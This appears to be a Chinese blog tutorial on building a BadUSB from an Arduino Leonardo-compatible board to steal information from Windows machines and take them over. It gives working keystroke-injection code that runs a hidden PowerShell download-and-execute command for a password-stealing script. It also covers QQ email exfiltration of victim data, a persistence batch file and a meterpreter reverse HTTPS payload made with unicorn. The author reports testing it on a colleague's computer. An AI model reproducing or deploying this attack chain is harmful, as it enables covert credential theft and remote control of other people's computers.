烧录Badusb

吐槽

本来以为工作结束了
结果只是幻想,当然也认识了自己的菜。
嗯,由于需要对公众宣传
准备烧一个Badusb

Badusb烧录

功能简介

Bad-Usb插入后,会模拟键盘对电脑进行操作,通过这些操作打开电脑的命令终端,并执行一条命令,这条命令将从指定网址下载恶意代码(通常为powershell脚本)并于后台静默运行。这些代码功能包括:窃取信息、反弹shell、发送邮件等,从而实现控制目标机或者窃取信息的目的。
总结一句话:谁插谁怀孕

搞起

1
2
3
系统:Windows 10
硬件:ATMega32U4 BS Micro pro Micro leonardo for Arduino compatibl 开发板
软件:Arduino、Teensy #Arduino版本不能超过1.6.4;Teensyduino安装在Arduino目录下

硬件看上去是这样的
1.jpg

开启SMTP

QQ邮箱也挺简单的
2.png
一封包含目标信息的邮件就发过来了

服务段

下载Badusb所需代码
main.ps1的2754行修改成自己的服务器IP
3.png
修改main.ps1的2903-2919行改为自己的QQ邮箱配置
4.png
修改GetPass.ps1中的内容
5.png
将文件上传至服务器

烧录

插上去

6.jpg
在Arduino中选择Arduino Leonardo
7.jpg
设备管理器中板子已被识别
8.png
将代码写入


代码在这里
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
void setup(){//初始化
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(500);
Keyboard.press('r');//r键
delay(100);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.println("powershell -windowstyle hidden IEX (New-Object Net.WebClient).DownloadString('http://xxx/getpass.ps1') ");
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.end();//结束键盘通讯
Keyboard.begin();//开始键盘通讯
delay(5000);//延时
Keyboard.press(KEY_LEFT_GUI);//win键
delay(10000);
Keyboard.press('r');//r键
delay(500);
Keyboard.release(KEY_LEFT_GUI);
Keyboard.release('r');
delay(500);
Keyboard.println("CMD");
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
delay(500);
Keyboard.println("start d:\\SHELL.BAT");
delay(100);
Keyboard.println("exit");
delay(500);
Keyboard.press(KEY_CAPS_LOCK);
Keyboard.release(KEY_CAPS_LOCK);
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.release(KEY_RETURN);
Keyboard.end();//结束键盘通讯
}
void loop() {}


上者获取基本信息,下者为了持久化

持久化

使用unicorn

1
root@kali:~/unicorn# python unicorn.py windows/meterpreter/reverse_https xxx 443

反向HTTPS的payload
9.png

测试效果

插了一下同事的电脑。( ̄▽ ̄)~*
邮件一封
10.png
会话一个

1
2
root@kali:~/unicorn# msfconsole -r unicorn.rc
meterpreter > load stdapi

11.png
感谢师傅们的解答

到此结束

如有错误请联系lanbaidetanlang@qq.com

文章目录
  1. 1. 吐槽
  2. 2. Badusb烧录
    1. 2.1. 功能简介
    2. 2.2. 搞起
      1. 2.2.1. 开启SMTP
    3. 2.3. 服务段
    4. 2.4. 烧录
      1. 2.4.1. 插上去
      2. 2.4.2. 持久化
      3. 2.4.3. 测试效果
  3. 3. 到此结束